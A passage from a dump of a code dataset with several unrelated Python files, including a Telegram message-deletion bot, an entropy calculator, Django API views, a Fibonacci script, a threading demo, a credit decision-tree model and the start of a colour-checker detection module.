ThreadPoolExecutor\r\n\r\n\r\nuser = os.environ.get('MONGO_USER') or \"root\"\r\npassword = os.environ.get('MONGO_PASSWORD') or \"example\"\r\nhost = os.environ.get('MONGO_HOST') or \"localhost\"\r\nport = os.environ.get('MONGO_PORT') or 27017\r\n\r\ntoken = os.environ.get('TG_BOT_TOKEN')\r\n\r\napp = 
Flask(__name__)\r\nbot = telegram.Bot(token=token)\r\nmongo_client = pymongo.MongoClient(\"mongodb://%s:%s@%s\" % (\r\n quote_plus(user), quote_plus(password), f'{host}:{port}'))\r\ndb = mongo_client[\"tgbot\"]\r\nmsg = db[\"tg-pending\"]\r\ntimer = db[\"tg-timer\"]\r\n\r\ndefaultDestruct = -1\r\ndestroyTimers = {}\r\n\r\n\r\n@app.route('/status')\r\ndef show_status():\r\n return 'Pending to be deleted: '+str(msg.count_documents({}))+' messages.
    '+str(destroyTimers)\r\n\r\n\r\n# @app.route('/process_queue')\r\ndef process_queue():\r\n timeNow = datetime.datetime.now().timestamp()\r\n deleted = 0\r\n while True:\r\n result = msg.find_one_and_delete({ 'expiry': {\"$lt\": timeNow} })\r\n if result is None:\r\n break\r\n else:\r\n try:\r\n msg_deleted = bot.delete_message(result[\"chat_id\"], result[\"msg_id\"])\r\n deleted = deleted + 1\r\n except:\r\n pass \r\n return 'Deleted '+str(deleted)+' messages.'\r\n\r\n\r\n@app.route('/hook', methods=['POST'])\r\ndef webhook_handler():\r\n if request.method == \"POST\":\r\n update = telegram.Update.de_json(request.get_json(force=True), bot)\r\n dispatcher.process_update(update)\r\n return 'ok'\r\n\r\n\r\ndef check_user_admin(bot, chat_id, user_id):\r\n member = bot.get_chat_member(chat_id, user_id)\r\n return (member.status in [\"creator\", \"administrator\"])\r\n\r\n\r\ndef check_bot_admin(bot, chat_id):\r\n self_id = bot.get_me().id\r\n admins = bot.get_chat_administrators(chat_id)\r\n admin_flag = False\r\n for admin in admins:\r\n if str(admin.user.id) == str(self_id):\r\n admin_flag = True\r\n return admin_flag\r\n\r\n\r\ndef status(bot, update):\r\n chat_id = update.message.chat_id\r\n output = '# of pending messages: '+str(msg.count_documents({}))+\"\\n\"\r\n output = output + '# of groups: '+str(timer.count_documents({}))+\"\\n\"\r\n timeNow = datetime.datetime.now().timestamp()\r\n maxExpiry = msg.find_one(sort=[(\"expiry\", 1)])[\"expiry\"]\r\n minExpiry = msg.find_one(sort=[(\"expiry\", -1)])[\"expiry\"]\r\n output = output + 'Next expiry: '+str(int((maxExpiry-timeNow)/60))+\" mins\\n\"\r\n output = output + 'Last expiry: '+str(int((minExpiry-timeNow)/60))+\" mins\\n\\n\"\r\n \r\n output = output + ''+\"\\n\"\r\n chats = timer.find({},{'chat_id':1, 'timer':1, '_id':0})\r\n for tmp in chats:\r\n output = output + tmp['chat_id'] + ': ' +str(tmp['timer'])+\"\\n\"\r\n bot.send_message(chat_id=chat_id, text=output)\r\n\r\n\r\ndef off_timer(bot, update):\r\n global destroyTimers\r\n chat_id = update.message.chat_id\r\n user_id = update.message.from_user.id\r\n if check_user_admin(bot, chat_id, user_id):\r\n destroyTimers[str(chat_id)] = -1\r\n timer.replace_one({'chat_id': str(chat_id)}, {'chat_id': str(chat_id), 'timer': -1}, True)\r\n bot.send_message(chat_id=chat_id, text='Self-destruct timer is switched off.')\r\n else:\r\n bot.send_message(chat_id=chat_id, text='Bot settings can only be changed by group admins.')\r\n\r\n\r\ndef set_timer(bot, update, args):\r\n global destroyTimers\r\n chat_id = update.message.chat_id\r\n user_id = update.message.from_user.id\r\n if not check_bot_admin(bot, chat_id):\r\n bot.send_message(chat_id=chat_id, text='DelHistoryBot must be promoted to group admin. Only admins can delete messages. 
Follow these instructions to add admin:')\r\n bot.send_photo(chat_id=chat_id, photo=\"https://i.imgur.com/90E0DO0.png\")\r\n elif not check_user_admin(bot, chat_id, user_id):\r\n bot.send_message(chat_id=chat_id, text='Bot settings can only be changed by group admins.')\r\n else:\r\n try:\r\n due = int(args[0])\r\n if due > 2875:\r\n bot.send_message(chat_id=chat_id, text='Sorry, must be within 48 hours.')\r\n else:\r\n destroyTimers[str(chat_id)] = due\r\n timer.replace_one({'chat_id': str(chat_id)}, {'chat_id': str(chat_id), 'timer': due}, True)\r\n bot.send_message(chat_id=chat_id, text='Self-destruct timer is set to '+str(due)+' minutes.')\r\n except (IndexError, ValueError):\r\n bot.send_message(chat_id=chat_id, text='Usage: /destroytimer ')\r\n\r\n\r\ndef delete_all(bot, update):\r\n chat_id = update.message.chat_id\r\n user_id = update.message.from_user.id\r\n # bot.send_message(chat_id=chat_id, text=f'chat_id={chat_id}\\nuser_id={user_id}')\r\n if not check_bot_admin(bot, chat_id):\r\n bot.send_message(chat_id=chat_id,\r\n text='DelHistoryBot must be promoted to group admin. Only admins can delete messages. Follow these instructions to add admin:')\r\n bot.send_photo(chat_id=chat_id, photo=\"https://i.imgur.com/90E0DO0.png\")\r\n elif not check_user_admin(bot, chat_id, user_id):\r\n bot.send_message(chat_id=chat_id, text='Only group admins can trigger delete all.')\r\n else:\r\n deleted = 0\r\n while True:\r\n result = msg.find_one_and_delete({'chat_id': str(chat_id)})\r\n if result is None:\r\n # bot.send_message(chat_id=chat_id, text='no msg found')\r\n break\r\n else:\r\n # bot.send_message(chat_id=chat_id, text=f'msg found, result={str(result)}')\r\n try:\r\n msg_deleted = bot.delete_message(result[\"chat_id\"], result[\"msg_id\"])\r\n deleted = deleted + 1\r\n # bot.send_message(chat_id=chat_id, text='msg deleted')\r\n except:\r\n # bot.send_message(chat_id=chat_id, text='msg delete failed')\r\n pass\r\n # bot.send_message(chat_id=chat_id, text='Deleted ' + str(deleted) + ' messages.')\r\n\r\n\r\ndef help(bot, update):\r\n print_str = \"\"\"Before use:\r\nInvite @DelHistoryBot to your group chat\r\nPromote @DelHistoryBot to be group admin\r\nFunctions:\r\n/help: print usage guidelines\r\n/destroytimer : enable timer in minutes, max minutes=2875 (about 2 days)\r\n/destroyoff: disable timer\r\n/destroynow: delete all messages pending for delete immediately\"\"\"\r\n chat_id = update.message.chat_id\r\n bot.send_message(chat_id=chat_id, text=print_str)\r\n\r\n\r\ndef msg_handler(bot, update):\r\n global destroyTimers\r\n chat_id = update.message.chat_id\r\n msg_id = update.message.message_id\r\n dt = update.message.date\r\n #dt = datetime.datetime.now()\r\n chat_timer = defaultDestruct\r\n if (str(chat_id) in destroyTimers):\r\n chat_timer = destroyTimers[str(chat_id)]\r\n if chat_timer == defaultDestruct:\r\n result = timer.find_one({'chat_id': str(chat_id)})\r\n if not result is None:\r\n chat_timer = result['timer']\r\n destroyTimers[str(chat_id)] = chat_timer\r\n if (chat_timer>0):\r\n e = dt.timestamp()+chat_timer*60\r\n msg.insert_one({'chat_id': str(chat_id), 'msg_id': msg_id, 'expiry': e})\r\n\r\n\r\nupdater = Updater(bot=bot, workers=0)\r\ndispatcher = updater.dispatcher\r\ndispatcher.add_handler(CommandHandler(\"status\", status))\r\ndispatcher.add_handler(CommandHandler(\"destroyoff\", off_timer))\r\ndispatcher.add_handler(CommandHandler(\"destroytimer\", set_timer, pass_args=True))\r\ndispatcher.add_handler(CommandHandler(\"destroynow\", 
delete_all))\r\ndispatcher.add_handler(CommandHandler(\"help\", help))\r\ndispatcher.add_handler(MessageHandler(Filters.all, msg_handler))\r\n\r\n\r\ndef main():\r\n # print('='*100)\r\n # print('running version 0.0.1')\r\n # print('='*100)\r\n def process_queue_job():\r\n while True:\r\n time.sleep(60)\r\n try:\r\n print(process_queue())\r\n except Exception as e:\r\n print(e)\r\n\r\n executor = ThreadPoolExecutor()\r\n _ = executor.submit(process_queue_job)\r\n\r\n app.run(host='0.0.0.0')\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"10780132","text":"import array\nimport io\n\nfrom math import ceil, log\nfrom typing import Tuple, List, BinaryIO, AnyStr\n\nfrequency = None\n\n\ndef calculate_entropy(contents: AnyStr) -> float:\n \"\"\" this function calculates the entropy of the file\n It is given by the formula:\n E = -SUM[v in 0..255](p(v) * ln(p(v)))\n \"\"\"\n\n data_length = len(contents)\n\n if data_length == 0:\n return 0\n\n count = array.array('L', [0] * 256)\n\n # keep a count of all the bytes\n for byte in contents:\n count[byte] += 1\n\n entropy = float(0)\n\n for value in count:\n if value:\n prob = (float(value) / data_length)\n entropy += (prob * log(prob, 2))\n entropy *= -1\n\n return entropy\n\n\ndef calculate_partition_entropy(fin: BinaryIO, num_partitions: int = 50) -> Tuple[float, List[float]]:\n \"\"\"Calculate the entropy of a file and its partitions.\"\"\"\n\n # Split input into num_parititions and calculate\n # parition entropy.\n fin.seek(0, io.SEEK_END)\n size = fin.tell()\n fin.seek(0)\n partition_size = int(ceil(size / float(num_partitions)))\n\n # Also calculate full file entropy using buffered calculator.\n p_entropies = []\n fullentropy = BufferedCalculator()\n for _ in range(num_partitions):\n partition = fin.read(partition_size)\n p_entropies.append(calculate_entropy(partition))\n fullentropy.update(partition)\n return fullentropy.entropy(), p_entropies\n\n\nclass BufferedCalculator(object):\n def __init__(self):\n global frequency\n import pyximport\n pyximport.install()\n # noinspection PyUnresolvedReferences\n from assemblyline.common import frequency\n\n self.c = {}\n self.length = 0\n\n def entropy(self) -> float:\n if self.length == 0:\n return 0.0\n\n length = float(self.length)\n\n entropy = 0.0\n for v in self.c.values():\n prob = float(v) / length\n entropy += prob * log(prob, 2)\n\n entropy *= -1\n\n # Make sure we don't return -0.0.\n if not entropy:\n entropy = 0.0\n\n return entropy\n\n def update(self, data: AnyStr, length: int = 0):\n if not length:\n length = len(data)\n\n self.length += length\n self.c = frequency.counts(data, length, self.c)\n","sub_path":"assemblyline/common/entropy.py","file_name":"entropy.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"121505364","text":"from django.contrib.auth.models import User, Group\nfrom rest_framework import viewsets, permissions, status, mixins, generics\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom api.serializers import UserSerializer, GroupSerializer, ArticleSerializer\nfrom api.models import Article\n\nclass ArticleList(APIView):\n def get(self, request, format=None):\n articles = Article.objects.all()\n 
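# Serialize the whole queryset; many=True tells the serializer to expect an iterable of Article instances rather than a single object.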
serializer = ArticleSerializer(articles, many=True)\n return Response(serializer.data)\n\n def post(self, request, format=None):\n serializer = ArticleSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\nclass UserViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows users to be viewed or edited.\n \"\"\"\n queryset = User.objects.all().order_by('-date_joined')\n serializer_class = UserSerializer\n permission_classes = [permissions.IsAuthenticated]\n\n\nclass GroupViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Group.objects.all()\n serializer_class = GroupSerializer\n permission_classes = [permissions.IsAuthenticated]","sub_path":"backend/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"279686863","text":"def fib(n):\n \"\"\"\n Fibonacci:\n fib(n) = fib(n-1) + fib(n-2), if n > 1\n fib(n) = 1, if n <= 1\n \"\"\"\n if n > 1:\n return fib(n-1)+fib(n-2)\n else:\n return 1\n
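# Note: this naive recursion takes exponential time; e.g. fib(30) makes 2*fib(30)-1,\n# roughly 2.7 million, recursive calls, so memoize or iterate for larger n.\n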
\ndef pedir_numero():\n numero = int(input('Enter an integer: '))\n return numero\n\ndef tela_boas_vindas(nome_programa):\n print(\"*****************************************************\")\n print(\" Welcome to the program:\", nome_programa)\n print(\"*****************************************************\")\n\n# testing the functions\ntela_boas_vindas('Recursive Fibonacci')\nnum = pedir_numero()\nfor i in range(0, num+1):\n print('Fib(',i, ') => ', fib(i))","sub_path":"Fontes/FibonacciRecursivo_com_boas_vindas.py","file_name":"FibonacciRecursivo_com_boas_vindas.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"630449968","text":"from characters.character import Character\nfrom entities.characterInfo import CharacterInfo\n\n\nclass Player(Character):\n def __init__(self, name=None, xRatio=0, yRatio=0, level='1', id=None):\n characterInfo = CharacterInfo({\n 'id': id,\n 'name': name,\n 'role': 'player',\n 'imageName': 'player',\n 'level': level,\n 'xRatio': xRatio,\n 'yRatio': yRatio\n })\n super().__init__(characterInfo)\n\n def transfer(self, canvas):\n for obj in self.canvases:\n canvas.delete(obj)\n\n def levelUP(self, space):\n self.level = str(int(self.level) + space)\n","sub_path":"characters/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"79293938","text":"from django.urls import path\nfrom . import views\r\n\napp_name = 'home'\nurlpatterns = [\n path('', views.home_page, name='home_page'),\n path('terms_of_use/', views.terms_of_use, name='terms'),\n path('privacy_policy/', views.privacy_policy, name='privacy'),\n path('how_to/', views.how_to, name='how_to')\n]\n","sub_path":"home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"538905630","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nimport torch\nfrom torch import nn\nfrom torch import optim\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms, models\nfrom collections import OrderedDict\nimport PIL\nfrom PIL import Image\n\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--data_dir', help='directory for data:', default = './flowers')\nparser.add_argument('--arch', type = str, default = 'vgg16', choices=['vgg16', 'densenet121'], help = 'Only vgg16 and densenet121 supported.')\nparser.add_argument('--save_dir', dest= 'save_dir', type = str, default = './checkpoint.pth', help = 'Folder where the model is saved: default is current.')\nparser.add_argument('--learning_rate', type = float, default = 0.001, help = 'Gradient descent learning rate')\nparser.add_argument('--hidden_layer', type = int, action= 'store', dest = 'hidden_layer', default = 25088, help = 'Number of hidden units #1 for classifier.')\nparser.add_argument('--hidden_layer2', type = int, action= 'store', dest = 'hidden_layer2', default = 4096, help = 'Number of hidden units #2 for classifier.')\nparser.add_argument('--output_layer', type = int, action= 'store', dest = 'output_layer', default = 102, help = 'Number of output units for classifier.')\nparser.add_argument('--epochs', type = int, help = 'Number of epochs', default = 3)\nparser.add_argument('--device', action='store_true', help='Use this flag if you want to use GPU for prediction')\n\nparser.add_argument('--image_path', type=str, help='path of image to be predicted', default = 'flowers/test/1/image_06743.jpg')\nparser.add_argument('--topk', type=int, default=5, help='display top k probabilities')\nparser.add_argument('--cat_to_name', type=str, default='cat_to_name.json', help='provide path to category mapping file')\nparser.add_argument('--checkpoint_path', type=str, help='checkpoint file to be used', default = 'checkpoint.pth')\nargs = parser.parse_args()\n\ndef validation(model, testloader, criterion):\n test_loss = 0\n accuracy = 0\n model.to(device)\n for images, labels in testloader:\n images, labels = images.to(device), labels.to(device)\n output = model.forward(images)\n test_loss += criterion(output, labels).item()\n \n ps = torch.exp(output)\n equality = (labels.data == ps.max(dim=1)[1])\n accuracy += equality.type(torch.FloatTensor).mean()\n \n return test_loss, accuracy\n\ndef load_checkpoint(filepath):\n checkpoint = torch.load(filepath)\n model = getattr(models, checkpoint['arch'])(pretrained=True)\n model.classifier = checkpoint['classifier']\n model.load_state_dict(checkpoint['state_dict'])\n model.class_to_idx = checkpoint['class_to_idx']\n optimizer = checkpoint['optimizer']\n epochs = checkpoint['epochs']\n \n return model, checkpoint['class_to_idx']\n\ndef process_image(image):\n ''' Scales, crops, and normalizes a PIL image for a PyTorch model,\n returns a Numpy array\n ''' \n \n image = Image.open(image)\n \n preprocess = transforms.Compose([transforms.Resize(255),\n 
transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])])\n \n image = preprocess(image)\n \n return image\n\ndef predict(image_path, model, topk, class_idx_dict):\n ''' Predict the class (or classes) of an image using a trained deep learning model.\n '''\n \n img = process_image(image_path)\n model.to(device)\n img = img.to(device)\n \n img_classes_dict = {v: k for k, v in class_idx_dict.items()}\n \n model.eval()\n \n with torch.no_grad():\n img.unsqueeze_(0)\n output = model.forward(img)\n ps = torch.exp(output)\n probs, classes = ps.topk(topk)\n probs, classes = probs[0].tolist(), classes[0].tolist()\n \n return_classes = []\n for c in classes:\n return_classes.append(img_classes_dict[c])\n \n return probs, return_classes","sub_path":"2_Create_Your_Own_Image_Classifier/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"262421832","text":"from functools import cmp_to_key\n\ndef strcmp(a, b):\n if s.index(a) < s.index(b):\n return -1\n if s.index(a) > s.index(b):\n return 1\n return 0\n\ns = input()\nt = input()\nt_in_s = []\nt_not_in_s = \"\"\nfor c in t:\n if c in s:\n t_in_s.append(c)\n else:\n t_not_in_s += c\n# Python 3: sorted() takes no cmp argument, so wrap the comparator with cmp_to_key\nt_in_s = sorted(t_in_s, key=cmp_to_key(strcmp))\nans = \"\"\nfor c in t_in_s:\n ans += c\nans += t_not_in_s\nprint(ans)","sub_path":"Code/CodeRecords/2530/60670/275130.py","file_name":"275130.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"11752936","text":"# If multiple threads attempt to access the same object,\n# it may end up in an inconsistent state.\n# To avoid this issue we need to use lock objects to synchronize threads.\n# A lock object can only be owned by one thread at a time.\n\nimport threading\nimport time\nclass myThread(threading.Thread):\n def __init__(self, threadID, name, counter):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n self.counter = counter\n def run(self):\n print(\"Starting \"+self.name)\n threadLock.acquire() # locking\n print_time(self.name, self.counter, 3)\n threadLock.release() # release\n\ndef print_time(threadname, delay, counter):\n while counter:\n time.sleep(delay)\n print(threadname, time.ctime(time.time()))\n counter -= 1\n\nthreadLock = threading.Lock()\nthreads = []\nthread1 = myThread(1, \"thread-1\", 1)\nthread2 = myThread(2, \"thread-2\", 2)\nthread1.start()\nthread2.start()\n\nthreads.append(thread1)\nthreads.append(thread2)\n\nfor item in threads:\n item.join()\nprint(\"Exiting main thread!\")\n\n","sub_path":"Syncronize_thread.py","file_name":"Syncronize_thread.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"442856379","text":"\"\"\"\r\nclass Itemlist\r\n\"\"\"\r\n\r\nfrom ItemForHire1 import read_or_write_option\r\nfrom item import Item\r\n\r\n\r\nclass ItemList:\r\n def __init__(self):\r\n \"\"\"\r\n Load items from the csv file.\r\n :return:\r\n \"\"\"\r\n self.items = []\r\n items = read_or_write_option('r', [])\r\n for item_list in items:\r\n item = Item(item_list[0], item_list[1], float(item_list[2]), item_list[3])\r\n self.items.append(item)\r\n\r\n def add_items(self, new_name, new_info, new_price):\r\n \"\"\"\r\n Add a new item to the list.\r\n :param new_name:\r\n :param new_info:\r\n :param new_price:\r\n :return:\r\n \"\"\"\r\n item = Item(new_name, new_info, float(new_price), \"in\")\r\n self.items.append(item)\r\n\r\n 
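# Illustrative usage with made-up values: ItemList().add_items('Kayak', 'Two-seater', 25.0)\r\n # appends Item('Kayak', 'Two-seater', 25.0, 'in'); newly added items start as available (\"in\").\r\n 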
def get_item(self, name):\r\n \"\"\"\r\n Return the item with the given name, or None if it is not found.\r\n :param name:\r\n :return:\r\n \"\"\"\r\n for item in self.items:\r\n if item.name == name:\r\n return item\r\n\r\n def get_item_for_saving(self):\r\n \"\"\"\r\n Export the final list of items as tuples for writing back to the csv file.\r\n :return:\r\n \"\"\"\r\n items_to_save = []\r\n\r\n for item in self.items:\r\n line = (item.name, item.info, item.price, item.availability)\r\n items_to_save.append(line)\r\n return items_to_save\r\n\r\n def change_availability(self, avai1, avai2):\r\n \"\"\"\r\n Change the first item whose availability equals avai1 to avai2 and return it.\r\n :return:\r\n \"\"\"\r\n for item in self.items:\r\n if item.availability == avai1:\r\n item.availability = avai2\r\n return item\r\n\r\n\r\n","sub_path":"itemlist.py","file_name":"itemlist.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"224008093","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 9 09:23:19 2020\nDecision Tree\n@author: andyvillamayor\n\"\"\"\n# The tree itself is built automatically by DecisionTreeClassifier\n# Parameters: entropy criterion, maximum depth = 4\n# libraries\nimport pandas as pd\nimport numpy as np\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nfrom sklearn.tree import export_graphviz\nimport pydot\n\n\n# read the data\ndata= pd.read_csv('creditos.csv',sep =',')\n\n# inspect the data\nprint(data.head())\n\n# validate the dataframe\nprint(pd.isnull(data).sum()) # 'tipo cartera' (portfolio type) has 3777 missing NaN values\n\n# compute the age\n\ndata['fechaHora'] = pd.to_datetime(data['fechaHora'])\ndata['nacimiento'] = pd.to_datetime(data['nacimiento'])\ndata['edad'] = ((data['fechaHora']-data['nacimiento'])/np.timedelta64(1,'Y')).astype(int)\n# the 'edad' (age) column is appended as the last column of the dataframe\n# check the changes in the variable explorer\n\n\n# select application and financial-system variables plus the target; discard post-approval variables\n# using hold-out\ndf1 = data.iloc[:,2:3]\ndf2 = data.iloc[:,83:84]\ndf3 = data.iloc[:,4:68]\ndf4 = data.iloc[:,82:83]\n\n# Merge into a single filtered dataframe\ndf = pd.concat([df1,df2,df3,df4], axis=1)\n\n# One-hot encoding for categorical variables\ndfOHEncoded = pd.get_dummies(df)\ndfOHEncoded.head()\n# automatically converts the qualitative/categorical variables into quantitative columns\n
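# Illustrative (hypothetical) example of the encoding: a column color = ['red', 'blue']\n# becomes two indicator columns, color_red and color_blue, holding 0s and 1s.\n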
\n# split dataset into train (80%) and test (20%)\nX = dfOHEncoded.iloc[:,0:110]\ny = dfOHEncoded['resultadoFinal_BIEN']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=1)\n\n# Train a decision tree using entropy and maximum depth 4\nclf = DecisionTreeClassifier(criterion=\"entropy\",max_depth=4)\nclf = clf.fit(X_train,y_train)\n\n# Predict on the test data\ny_pred = clf.predict(X_test)\nprint('-----------------------------------------------------------------------------------------')\n# Accuracy: (tp+tn)/n - where n is the total of FP+FN+TP+TN\nprint(\"Accuracy of the samples:\",metrics.accuracy_score(y_test, y_pred))\nprint(metrics.precision_recall_fscore_support(y_test, y_pred, average=None))\nprint('-----------------------------------------------------------------------------------------')\nprint (\n 'The model was trained with 20% of the data held out (test_size=0.2)'\n ' using entropy with a maximum depth of 4,'\n ' with a mean of 0.88 (between precision and recall).'\n )\nprint('----------------------------')\nprint('Computing the confusion matrix')\nprint('----------------------------')\n#metrics.confusion_matrix(y_test, y_pred)\nprint(pd.crosstab(y_test, y_pred, \n rownames=['actual'], \n colnames=['pred'], margins=False, margins_name=\"Total\")\n)\n\n# Get feature importances and check the most relevant variables\nprint('----------------------------')\nprint('Feature importances')\nprint('Most relevant variables')\nprint('----------------------------')\nfi = pd.DataFrame(list(zip(X.columns,clf.feature_importances_)), columns=['feature','importance'])\nprint(fi[fi['importance'] > 0.0].sort_values(by=['importance'], ascending=False))\n\n\n\n# load the graph exporter and write the tree out as an image\nexport_graphviz(clf, out_file=\"creditos.dot\", \n filled=True, rounded=True,\n special_characters=True, feature_names = X.columns,class_names = ['0','1'])\n\n(graph,) = pydot.graph_from_dot_file('creditos.dot')\ngraph.write_png('creditos.png')\n","sub_path":"arbol-ohencode-jp.py","file_name":"arbol-ohencode-jp.py","file_ext":"py","file_size_in_byte":3626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"96856227","text":"# -*- coding: utf-8 -*-\n\"\"\"\nColour Checker Detection - Segmentation\n=======================================\n\nDefines objects for colour checker detection using segmentation:\n\n- :func:`colour_checkers_coordinates_segmentation`\n- :func:`extract_colour_checkers_segmentation`\n- :func:`detect_colour_checkers_segmentation`\n\nReferences\n----------\n- :cite:`Abecassis2011` : Abecassis, F. (2011). OpenCV - Rotation\n (Deskewing). Retrieved October 27, 2018, from http://felix.abecassis.me/\\\n2011/10/opencv-rotation-deskewing/\n\"\"\"\n\nfrom __future__ import division, unicode_literals\n\nimport cv2\nimport numpy as np\nfrom collections import namedtuple\n\nfrom colour.models import cctf_decoding, cctf_encoding\nfrom colour.utilities import as_float_array, as_int_array, as_int\n\n__author__ = 'Colour Developers'\n__copyright__ = 'Copyright (C) 2018-2020 - Colour Developers'\n__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'\n__maintainer__ = 'Colour Developers'\n__email__ = 'colour-developers@colour-science.org'\n__status__ = 'Production'\n\n__all__ = [\n 'ASPECT_RATIO', 'SWATCHES_HORIZONTAL', 'SWATCHES_VERTICAL', 'SWATCHES',\n 'SWATCH_MINIMUM_AREA_FACTOR', 'WORKING_WIDTH',\n 'ColourCheckersDetectionData', 'ColourCheckerSwatchesData', 'swatch_masks',\n 'as_8_bit_BGR_image', 'adjust_image', 'is_square', 'contour_centroid',\n 'scale_contour', 'crop_and_level_image_with_rectangle',\n 'colour_checkers_coordinates_segmentation',\n 'extract_colour_checkers_segmentation',\n 'detect_colour_checkers_segmentation'\n]\n\nASPECT_RATIO = 1.5\n\"\"\"\nColour checker aspect ratio.\n\nASPECT_RATIO : numeric\n\"\"\"\n\nSWATCHES_HORIZONTAL = 6\n\"\"\"\nColour checker horizontal swatches count.\n\nSWATCHES_HORIZONTAL : int\n\"\"\"\n\nSWATCHES_VERTICAL = 4\n\"\"\"\nColour checker vertical swatches count.\n\nSWATCHES_VERTICAL : int\n\"\"\"\n\nSWATCHES = SWATCHES_HORIZONTAL * SWATCHES_VERTICAL\n\"\"\"\nColour checker total swatches count.\n\nSWATCHES : int\n\"\"\"\n\nSWATCH_MINIMUM_AREA_FACTOR = 200\n\"\"\"\nSwatch minimum area factor :math:`f` with the minimum area :math:`m_a`\nexpressed as follows: :math:`m_a = image_w * image_h / s_c / f` where\n:math:`image_w`, :math:`image_h` and :math:`s_c` are respectively the image\nwidth, height and 
the swatches count.\n\nSWATCH_MINIMUM_AREA_FACTOR : numeric\n\"\"\"\n\nWORKING_WIDTH = 1440\n\"\"\"\nWidth processed images are resized to.\n\nWORKING_WIDTH : int\n\"\"\"\n\n\nclass ColourCheckersDetectionData(\n namedtuple(\n 'ColourCheckersDetectionData',\n ('colour_checkers', 'clusters', 'swatches', 'segmented_image'))):\n \"\"\"\n Colour checkers detection data used for plotting, debugging and further\n analysis.\n\n Parameters\n ----------\n colour_checkers : array_like\n Colour checker bounding boxes, i.e., the clusters that have the\n relevant count of swatches.\n clusters : array_like\n Detected swatches clusters.\n swatches : array_like\n Detected swatches.\n segmented_image : numeric or array_like\n Thresholded/Segmented image.\n \"\"\"\n\n\nclass ColourCheckerSwatchesData(\n namedtuple(\n 'ColourCheckerSwatchesData',\n ('swatch_colours', 'colour_checker_image', 'swatch_masks'))):\n \"\"\"\n Colour checker swatches data used for plotting, debugging and further\n analysis.\n\n Parameters\n ----------\n swatch_colours : array_like\n Colour checker swatches colours.\n colour_checker_image : array_like\n Cropped and levelled Colour checker image.\n swatch_masks : array_like\n Colour checker swatches masks.\n \"\"\"\n\n\ndef swatch_masks(width, height, swatches_h, swatches_v, samples):\n \"\"\"\n Returns swatch masks for given image width and height and swatches count.\n\n Parameters\n ----------\n width : int\n Image width.\n height : int\n Image height.\n swatches_h : int\n Horizontal swatches count.\n swatches_v : int\n Vertical swatches count.\n samples : int\n Samples count.\n\n Returns\n -------\n list\n List of swatch masks.\n\n Examples\n --------\n >>> from pprint import pprint\n >>> pprint(swatch_masks(16, 8, 4, 2, 1)) # doctest: +ELLIPSIS\n [array([2, 2, 2, 2]...),\n array([2, 2, 6, 6]...),\n array([ 2, 2, 10, 10]...),\n array([ 2, 2, 14, 14]...),\n array([6, 6, 2, 2]...),\n array([6, 6, 6, 6]...),\n array([ 6, 6, 10, 10]...),\n array([ 6, 6, 14, 14]...)]\n \"\"\"\n\n samples = as_int(samples / 2)\n\n masks = []\n offset_h = width / swatches_h / 2\n offset_v = height / swatches_v / 2\n for j in np.linspace(offset_v, height - offset_v, swatches_v):\n for i in np.linspace(offset_h, width - offset_h, swatches_h):\n masks.append(\n as_int_array(\n [j - samples, j + samples, i - samples, i + samples]))\n\n return masks\n\n\ndef as_8_bit_BGR_image(image):\n \"\"\"\n Converts and encodes given linear float *RGB* image to 8-bit *BGR* with\n *sRGB* reverse OETF.\n\n Parameters\n ----------\n image : array_like\n Image to convert.\n\n Returns\n -------\n ndarray\n Converted image.\n\n Notes\n -----\n - In the eventuality where the image is already an integer array, the\n conversion is by-passed.\n\n Examples\n --------\n >>> from colour.algebra import random_triplet_generator\n >>> prng = np.random.RandomState(4)\n >>> image = list(random_triplet_generator(8, random_state=prng))\n >>> image = np.reshape(image, [4, 2, 3])\n >>> print(image)\n [[[ 0.96702984 0.25298236 0.0089861 ]\n [ 0.54723225 